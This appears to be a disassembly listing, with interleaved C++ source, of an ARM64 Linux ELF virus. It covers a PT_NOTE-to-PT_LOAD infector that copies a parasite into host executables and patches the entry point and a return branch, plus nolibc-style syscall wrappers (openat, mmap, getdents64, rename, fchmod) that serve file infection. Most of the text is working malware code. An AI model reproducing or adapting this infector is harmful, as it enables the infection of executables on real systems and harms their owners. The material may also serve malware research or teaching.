    1b30:	b900056a 	str	w10, [x11, #4]
      section_entry->sh_addr = parasite_load_address;
    1b34:	a900a16c 	stp	x12, x8, [x11, #8]
      section_entry->sh_addralign = 64;
    1b38:	f900196d 	str	x13, [x11, #48]
    1b3c:	14000015 	b	1b90 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0xdc>
  for (size_t i = 0; i < sht_entry_count; ++i) {
    1b40:	8b01018c 	add	x12, x12, x1
    1b44:	aa1f03eb 	mov	x11, xzr
    1b48:	d100054e 	sub	x14, x10, #0x1
    1b4c:	9100c18c 	add	x12, x12, #0x30
    1b50:	eb0b01df 	cmp	x14, x11
    1b54:	54000300 	b.eq	1bb4 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x100>  // b.none
    if (section_entry->sh_offset == original_pt_note_file_offset) {
    1b58:	f940158f 	ldr	x15, [x12, #40]
    1b5c:	9101018c 	add	x12, x12, #0x40
  for (size_t i = 0; i < sht_entry_count; ++i) {
    1b60:	9100056b 	add	x11, x11, #0x1
    if (section_entry->sh_offset == original_pt_note_file_offset) {
    1b64:	eb0d01ff 	cmp	x15, x13
    1b68:	54ffff41 	b.ne	1b50 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x9c>  // b.any
    1b6c:	5280002d 	mov	w13, #0x1                   	// #1
    1b70:	528000ce 	mov	w14, #0x6                   	// #6
    1b74:	5280080f 	mov	w15, #0x40                  	// #64
    if (!patch_sht(ehdr, mutable_shdr, virus_size, virus_offset_,
    1b78:	eb0a017f 	cmp	x11, x10
      section_entry->sh_offset = virus_offset;
    1b7c:	a93e9189 	stp	x9, x4, [x12, #-24]
      section_entry->sh_type = SHT_PROGBITS;
    1b80:	b81d418d 	stur	w13, [x12, #-44]
      section_entry->sh_addr = parasite_load_address;
    1b84:	a93da18e 	stp	x14, x8, [x12, #-40]
      section_entry->sh_addralign = 64;
    1b88:	f900018f 	str	x15, [x12]
    if (!patch_sht(ehdr, mutable_shdr, virus_size, virus_offset_,
    1b8c:	54000142 	b.cs	1bb4 <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x100>  // b.hs, b.nlast
    1b90:	8b090020 	add	x0, x1, x9
      return std::nullopt;
    }
  }

  // Inject the virus.
  vt::memcpy(&host_mapping[virus_offset_], &parasite_mapping.front(),
    1b94:	aa0303e1 	mov	x1, x3
    1b98:	aa0403e2 	mov	x2, x4
    1b9c:	94000053 	bl	1ce8 <vt::memcpy(void*, void const*, unsigned long)>
             parasite_mapping.size());

  return InjectionResult{
      .parasite_entry_address = parasite_load_address_,
      .parasite_file_offset = virus_offset_,
    1ba0:	3dc00a80 	ldr	q0, [x20, #32]
    1ba4:	52800028 	mov	w8, #0x1                   	// #1
    1ba8:	6e004000 	ext	v0.16b, v0.16b, v0.16b, #8
    1bac:	3d800260 	str	q0, [x19]
    1bb0:	14000003 	b	1bbc <vt::infector::PtNoteInfector::inject(std::__1::span<std::byte, 18446744073709551615ul>, std::__1::span<std::byte const, 18446744073709551615ul>)+0x108>
    1bb4:	2a1f03e8 	mov	w8, wzr
    1bb8:	3900027f 	strb	wzr, [x19]
    1bbc:	39004268 	strb	w8, [x19, #16]
  };
}
    1bc0:	a9414ff4 	ldp	x20, x19, [sp, #16]
    1bc4:	f84207fe 	ldr	x30, [sp], #32
    1bc8:	d65f03c0 	ret

0000000000001bcc <vt::infector::PtNoteInfector::injected_host_size()>:
  // vaddr. Therefore, the file size will be extended. Note that this is not
  // necessary for non-PIE but doing this makes both PIE and non-PIE handling
  // simple. The size effect is that the executable would be very big, if the
  // victim happens to use a custom linker script that points segments at a very
  // large starting vaddr.
  return virus_offset_ + parasite_size_;
    1bcc:	f9401008 	ldr	x8, [x0, #32]
    1bd0:	f9400409 	ldr	x9, [x0, #8]
    1bd4:	8b080120 	add	x0, x9, x8
    1bd8:	d65f03c0 	ret

0000000000001bdc <vt::open(char const*, int, unsigned int)>:
#endif
}
}  // namespace

int open(const char* path, int flags) { return open(path, flags, 0); }
int open(const char* path, int flags, mode_t mode) {
    1bdc:	aa0003e9 	mov	x9, x0
  return my_syscall4(__NR_openat, AT_FDCWD, path, flags, mode);
    1be0:	93407c2a 	sxtw	x10, w1
    1be4:	92800c60 	mov	x0, #0xffffffffffffff9c    	// #-100
    1be8:	2a0203e3 	mov	w3, w2
    1bec:	52800708 	mov	w8, #0x38                  	// #56
    1bf0:	aa0903e1 	mov	x1, x9
    1bf4:	aa0a03e2 	mov	x2, x10
    1bf8:	d4000001 	svc	#0x0
  return sys_open(path, flags, mode);
    1bfc:	d65f03c0 	ret

0000000000001c00 <vt::fchmod(int, unsigned int)>:
#error Neither __NR_fchmodat nor __NR_chmod defined, cannot implement sys_chmod()
#endif
}

int sys_fchmod(int fd, mode_t mode) {
  return my_syscall2(__NR_fchmod, fd, mode);
    1c00:	2a0103e1 	mov	w1, w1
    1c04:	52800688 	mov	w8, #0x34                  	// #52
    1c08:	93407c00 	sxtw	x0, w0
    1c0c:	d4000001 	svc	#0x0
mode_t sys_umask(mode_t mode) { return my_syscall1(__NR_umask, mode); }

}  // namespace

int chmod(const char* path, mode_t mode) { return sys_chmod(path, mode); }
int fchmod(int fd, mode_t mode) { return sys_fchmod(fd, mode); }
    1c10:	d65f03c0 	ret

0000000000001c14 <vt::fstat(int, stat*)>:
int fstat(int fd, struct stat* buf) { return sys_fstat(fd, buf); }
    1c14:	d10203ff 	sub	sp, sp, #0x80
    1c18:	aa0103e9 	mov	x9, x1
  long ret = my_syscall2(__NR_fstat, fd, &stat);
    1c1c:	910003e1 	mov	x1, sp
    1c20:	93407c00 	sxtw	x0, w0
    1c24:	52800a08 	mov	w8, #0x50                  	// #80
    1c28:	d4000001 	svc	#0x0
  buf->st_rdev = stat.st_rdev;
    1c2c:	f94013e8 	ldr	x8, [sp, #32]
  buf->st_dev = stat.st_dev;
    1c30:	ad4007e0 	ldp	q0, q1, [sp]
  buf->st_rdev = stat.st_rdev;
    1c34:	f9001128 	str	x8, [x9, #32]
  buf->st_size = stat.st_size;
    1c38:	f9401bea 	ldr	x10, [sp, #48]
  buf->st_dev = stat.st_dev;
    1c3c:	ad000520 	stp	q0, q1, [x9]
  buf->st_blksize = stat.st_blksize;
    1c40:	b9403be8 	ldr	w8, [sp, #56]
  buf->st_blocks = stat.st_blocks;
    1c44:	3dc013e0 	ldr	q0, [sp, #64]
  buf->st_size = stat.st_size;
    1c48:	f900192a 	str	x10, [x9, #48]
  buf->st_ctime = stat.sys_st_ctime;
    1c4c:	f94037ea 	ldr	x10, [sp, #104]
  buf->st_blksize = stat.st_blksize;
    1c50:	b9003928 	str	w8, [x9, #56]
  buf->st_mtime = stat.sys_st_mtime;
    1c54:	f9402fe8 	ldr	x8, [sp, #88]
  buf->st_blocks = stat.st_blocks;
    1c58:	3d801120 	str	q0, [x9, #64]
  buf->st_ctime = stat.sys_st_ctime;
    1c5c:	f900352a 	str	x10, [x9, #104]
  buf->st_mtime = stat.sys_st_mtime;
    1c60:	f9002d28 	str	x8, [x9, #88]
int fstat(int fd, struct stat* buf) { return sys_fstat(fd, buf); }
    1c64:	910203ff 	add	sp, sp, #0x80
    1c68:	d65f03c0 	ret

0000000000001c6c <vt::redirection::EntryPointPatcher::operator()(unsigned long, unsigned long, unsigned long, std::__1::span<std::byte, 18446744073709551615ul>)>:

  auto& ehdr = reinterpret_cast<Elf64_Ehdr&>(*victim.data());

  // Calculate the difference between original (destination) and current branch
  // instruction.
  int32_t rel = ehdr.e_entry -
    1c6c:	b9401889 	ldr	w9, [x4, #24]
                (parasite_entry_address + patch_offset_from_parasite_start);
    1c70:	0b010068 	add	w8, w3, w1

  rel /= 4;
  auto* inst = reinterpret_cast<int32_t*>(
      &victim[parasite_file_offset + patch_offset_from_parasite_start]);
    1c74:	8b02006a 	add	x10, x3, x2
  constexpr auto op_code = 0b00010100000000000000000000000000;

  *inst |= (op_code);

  ehdr.e_entry = parasite_entry_address;
  return true;
    1c78:	52800020 	mov	w0, #0x1                   	// #1
  ehdr.e_entry = parasite_entry_address;
    1c7c:	f9000c81 	str	x1, [x4, #24]
  int32_t rel = ehdr.e_entry -
    1c80:	4b080128 	sub	w8, w9, w8
  rel /= 4;
    1c84:	11000d09 	add	w9, w8, #0x3
    1c88:	7100011f 	cmp	w8, #0x0
    1c8c:	1a88b128 	csel	w8, w9, w8, lt  // lt = tstop
    1c90:	52a28009 	mov	w9, #0x14000000            	// #335544320
  *inst |= (op_code);
    1c94:	33026d09 	bfxil	w9, w8, #2, #26
    1c98:	b82a6889 	str	w9, [x4, x10]
  return true;
    1c9c:	d65f03c0 	ret

0000000000001ca0 <vt::rename(char const*, char const*)>:
FILE* stdout() { return reinterpret_cast<FILE*>(-2); }
FILE* stderr() { return reinterpret_cast<FILE*>(-1); }

}  // namespace

int rename(const char* old, const char* cur) { return sys_rename(old, cur); }
    1ca0:	aa0103e3 	mov	x3, x1
    1ca4:	aa0003e1 	mov	x1, x0
  return my_syscall4(__NR_renameat, AT_FDCWD, old, AT_FDCWD, cur);
    1ca8:	92800c60 	mov	x0, #0xffffffffffffff9c    	// #-100
    1cac:	92800c62 	mov	x2, #0xffffffffffffff9c    	// #-100
    1cb0:	528004c8 	mov	w8, #0x26                  	// #38
    1cb4:	d4000001 	svc	#0x0
int rename(const char* old, const char* cur) { return sys_rename(old, cur); }
    1cb8:	d65f03c0 	ret

0000000000001cbc <vt::mmap(void*, unsigned long, int, int, int, long)>:
  offset >>= 12;
#else
  n = __NR_mmap;
#endif

  return (void*)my_syscall6(n, addr, length, prot, flags, fd, offset);
    1cbc:	52801bc8 	mov	w8, #0xde                  	// #222
    1cc0:	93407c42 	sxtw	x2, w2
    1cc4:	93407c63 	sxtw	x3, w3
    1cc8:	93407c84 	sxtw	x4, w4
    1ccc:	d4000001 	svc	#0x0

void* mmap(void* addr, size_t length, int prot, int flags, int fd,
           off_t offset) {
  void* ret = sys_mmap(addr, length, prot, flags, fd, offset);

  if ((unsigned long)ret >= -4095UL) {
    1cd0:	b140041f 	cmn	x0, #0x1, lsl #12
    1cd4:	da9f9000 	csinv	x0, x0, xzr, ls  // ls = plast
    ret = MAP_FAILED;
  }
  return ret;
    1cd8:	d65f03c0 	ret

0000000000001cdc <vt::munmap(void*, unsigned long)>:
  return my_syscall2(__NR_munmap, addr, length);
    1cdc:	52801ae8 	mov	w8, #0xd7                  	// #215
    1ce0:	d4000001 	svc	#0x0
}

int munmap(void* addr, size_t length) { return sys_munmap(addr, length); }
    1ce4:	d65f03c0 	ret

0000000000001ce8 <vt::memcpy(void*, void const*, unsigned long)>:
  }
  return dst;
}

void* memcpy(void* dst, const void* src, size_t len) {
  if ((const char*)src + len >= (const char*)dst) {
    1ce8:	8b020028 	add	x8, x1, x2
    1cec:	eb00011f 	cmp	x8, x0
    1cf0:	54000102 	b.cs	1d10 <vt::memcpy(void*, void const*, unsigned long)+0x28>  // b.hs, b.nlast
  while (pos < len) {
    1cf4:	b40001e2 	cbz	x2, 1d30 <vt::memcpy(void*, void const*, unsigned long)+0x48>
    1cf8:	aa0003e8 	mov	x8, x0
    ((char*)dst)[pos] = ((const char*)src)[pos];
    1cfc:	38401429 	ldrb	w9, [x1], #1
  while (pos < len) {
    1d00:	f1000442 	subs	x2, x2, #0x1
    ((char*)dst)[pos] = ((const char*)src)[pos];
    1d04:	38001509 	strb	w9, [x8], #1
  while (pos < len) {
    1d08:	54ffffa1 	b.ne	1cfc <vt::memcpy(void*, void const*, unsigned long)+0x14>  // b.any
    1d0c:	14000009 	b	1d30 <vt::memcpy(void*, void const*, unsigned long)+0x48>
  while (len) {
    1d10:	b4000102 	cbz	x2, 1d30 <vt::memcpy(void*, void const*, unsigned long)+0x48>
    1d14:	d1000408 	sub	x8, x0, #0x1
    1d18:	d1000429 	sub	x9, x1, #0x1
    ((char*)dst)[len] = ((const char*)src)[len];
    1d1c:	3862692a 	ldrb	w10, [x9, x2]
    len--;
    1d20:	f100044b 	subs	x11, x2, #0x1
    ((char*)dst)[len] = ((const char*)src)[len];
    1d24:	3822690a 	strb	w10, [x8, x2]
    1d28:	aa0b03e2 	mov	x2, x11
  while (len) {
    1d2c:	54ffff81 	b.ne	1d1c <vt::memcpy(void*, void const*, unsigned long)+0x34>  // b.any
    return _nolibc_memcpy_down(dst, src, len);
  } else {
    return _nolibc_memcpy_up(dst, src, len);
  }
}
    1d30:	d65f03c0 	ret

0000000000001d34 <vt::strcmp(char const*, char const*)>:

int strcmp(const char* a, const char* b) {
  unsigned int c;
  int diff;

  while (!(diff = (unsigned char)*a++ - (c = (unsigned char)*b++)) && c) {
    1d34:	38401408 	ldrb	w8, [x0], #1
    1d38:	38401429 	ldrb	w9, [x1], #1
    1d3c:	6b090108 	subs	w8, w8, w9
    1d40:	7a400924 	ccmp	w9, #0x0, #0x4, eq  // eq = none
    1d44:	54ffff81 	b.ne	1d34 <vt::strcmp(char const*, char const*)>  // b.any
  }
  return diff;
    1d48:	2a0803e0 	mov	w0, w8
    1d4c:	d65f03c0 	ret

0000000000001d50 <vt::strcpy(char*, char const*)>:
}

char* strcpy(char* dst, const char* src) {
    1d50:	aa1f03e8 	mov	x8, xzr
  char* ret = dst;

  while ((*dst++ = *src++)) {
    1d54:	38686829 	ldrb	w9, [x1, x8]
    1d58:	38286809 	strb	w9, [x0, x8]
    1d5c:	91000508 	add	x8, x8, #0x1
    1d60:	35ffffa9 	cbnz	w9, 1d54 <vt::strcpy(char*, char const*)+0x4>
  }

  return ret;
    1d64:	d65f03c0 	ret

0000000000001d68 <vt::strlen(char const*)>:
}

/* do not trust __builtin_constant_p() at -O0, as clang will emit a test and
 * the two branches, then will rely on an external definition of strlen().
 */
size_t strlen(const char* str) {
    1d68:	aa1f03e8 	mov	x8, xzr
  for (len = 0; str[len]; len++) {
    1d6c:	38686809 	ldrb	w9, [x0, x8]
    1d70:	91000508 	add	x8, x8, #0x1
    1d74:	35ffffc9 	cbnz	w9, 1d6c <vt::strlen(char const*)+0x4>
#if defined(__OPTIMIZE__)
  return __builtin_constant_p((str)) ? __builtin_strlen((str))
    1d78:	d1000500 	sub	x0, x8, #0x1
    1d7c:	d65f03c0 	ret

0000000000001d80 <memset>:
  while (len--) {
    1d80:	b40000a2 	cbz	x2, 1d94 <memset+0x14>
    1d84:	aa0003e8 	mov	x8, x0
    1d88:	f1000442 	subs	x2, x2, #0x1
    *(p++) = b;
    1d8c:	38001501 	strb	w1, [x8], #1
  while (len--) {
    1d90:	54ffffc1 	b.ne	1d88 <memset+0x8>  // b.any
  return (char*)ret;
}
}  // namespace vt

extern "C" void* memset(void* dst, int b, size_t len) noexcept {
  return vt::memset(dst, b, len);
    1d94:	d65f03c0 	ret

0000000000001d98 <vt::fchown(int, unsigned int, unsigned int)>:
#error Neither __NR_fchownat nor __NR_chown defined, cannot implement sys_chown()
#endif
}

int sys_fchown(int fd, uid_t owner, gid_t group) {
  return my_syscall3(__NR_fchown, fd, owner, group);
    1d98:	2a0103e1 	mov	w1, w1
    1d9c:	2a0203e2 	mov	w2, w2
    1da0:	93407c00 	sxtw	x0, w0
    1da4:	528006e8 	mov	w8, #0x37                  	// #55
    1da8:	d4000001 	svc	#0x0
int chown(const char* path, uid_t owner, gid_t group) {
  return sys_chown(path, owner, group);
}

int fchown(int fd, uid_t owner, gid_t group) {
  return sys_fchown(fd, owner, group);
    1dac:	d65f03c0 	ret

0000000000001db0 <vt::close(int)>:
int sys_close(int fd) { return my_syscall1(__NR_close, fd); }
    1db0:	52800728 	mov	w8, #0x39                  	// #57
    1db4:	93407c00 	sxtw	x0, w0
    1db8:	d4000001 	svc	#0x0
}

int chroot(const char* path) { return sys_chroot(path); }

int close(int fd) { return sys_close(fd); }
    1dbc:	d65f03c0 	ret

0000000000001dc0 <vt::exit(int)>:
void sys_exit(int status) { my_syscall1(__NR_exit, status & 255); }
    1dc0:	12001c00 	and	w0, w0, #0xff
    1dc4:	52800ba8 	mov	w8, #0x5d                  	// #93
    1dc8:	d4000001 	svc	#0x0

0000000000001dcc <vt::getdents64(int, vt::linux_dirent64*, int)>:
  return my_syscall3(__NR_getdents64, fd, dirp, count);
    1dcc:	528007a8 	mov	w8, #0x3d                  	// #61
    1dd0:	93407c00 	sxtw	x0, w0
    1dd4:	93407c42 	sxtw	x2, w2
    1dd8:	d4000001 	svc	#0x0
pid_t fork(void) { return sys_fork(); }

int fsync(int fd) { return sys_fsync(fd); }

int getdents64(int fd, struct linux_dirent64* dirp, int count) {
  return sys_getdents64(fd, dirp, count);
    1ddc:	d65f03c0 	ret

0000000000001de0 <vt::ftruncate(int, long)>:
  return my_syscall2(__NR_ftruncate, fd, length);
    1de0:	528005c8 	mov	w8, #0x2e                  	// #46
    1de4:	93407c00 	sxtw	x0, w0
    1de8:	d4000001 	svc	#0x0

off_t lseek(int fd, off_t offset, int whence) {
  return sys_lseek(fd, offset, whence);
}

int ftruncate(int fd, off_t length) { return sys_ftruncate(fd, length); }
    1dec:	d65f03c0 	ret

0000000000001df0 <vt::unlink(char const*)>:

pid_t setsid(void) { return sys_setsid(); }

int symlink(const char* old, const char* cur) { return sys_symlink(old, cur); }

int unlink(const char* path) { return sys_unlink(path); }
    1df0:	aa0003e1 	mov	x1, x0
  return my_syscall3(__NR_unlinkat, AT_FDCWD, path, 0);
    1df4:	92800c60 	mov	x0, #0xffffffffffffff9c    	// #-100
    1df8:	aa1f03e2 	mov	x2, xzr
    1dfc:	52800468 	mov	w8, #0x23                  	// #35
    1e00:	d4000001 	svc	#0x0
int unlink(const char* path) { return sys_unlink(path); }
    1e04:	d65f03c0 	ret

0000000000001e08 <vt::write(int, void const*, unsigned long)>:
  return my_syscall3(__NR_write, fd, buf, count);
    1e08:	52800808 	mov	w8, #0x40                  	// #64
    1e0c:	93407c00 	sxtw	x0, w0
    1e10:	d4000001 	svc	#0x0
}

int tcsetpgrp(int fd, pid_t pid) { return vt::ioctl(fd, TIOCSPGRP, &pid); }

ssize_t write(int fd, const void* buf, size_t count) {
  return sys_write(fd, buf, count);
    1e14:	d65f03c0 	ret
